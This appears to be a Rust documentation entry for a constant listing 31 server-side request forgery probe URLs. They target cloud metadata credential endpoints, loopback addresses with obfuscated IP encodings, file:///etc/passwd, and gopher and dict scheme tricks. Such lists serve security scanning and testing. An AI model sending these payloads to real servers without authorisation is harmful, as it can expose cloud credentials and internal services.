pub const SSRF: &str = "http://169.254.169.254/latest/meta-data/\nhttp://169.254.169.254/latest/user-data/\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/\nhttp://metadata.google.internal/computeMetadata/v1/\nhttp://metadata.google.internal/computeMetadata/v1/instance/service-accounts/\nhttp://169.254.169.254/metadata/instance?api-version=2019-06-01\nhttp://169.254.169.254/metadata/instance/compute?api-version=2019-06-01\nhttp://localhost/\nhttp://localhost:22/\nhttp://localhost:80/\nhttp://localhost:443/\nhttp://localhost:8080/\nhttp://localhost:8443/\nhttp://127.0.0.1/\nhttp://127.0.0.1:22/\nhttp://127.0.0.1:80/\nhttp://0.0.0.0/\nhttp://0/\nhttp://[::1]/\nhttp://[0000::1]/\nfile:///etc/passwd\nfile:///c:/windows/win.ini\ngopher://localhost:8080/_GET / HTTP/1.0\ndict://localhost:11211/\nsftp://localhost:22/\ntftp://localhost:69/etc/passwd\nldap://localhost:389/\njar:http://localhost!/\nhttp://2130706433/\nhttp://0x7f.0x0.0x0.0x1/\nhttp://0177.0.0.1/";Expand description
Server-side request forgery probe URLs (31 patterns)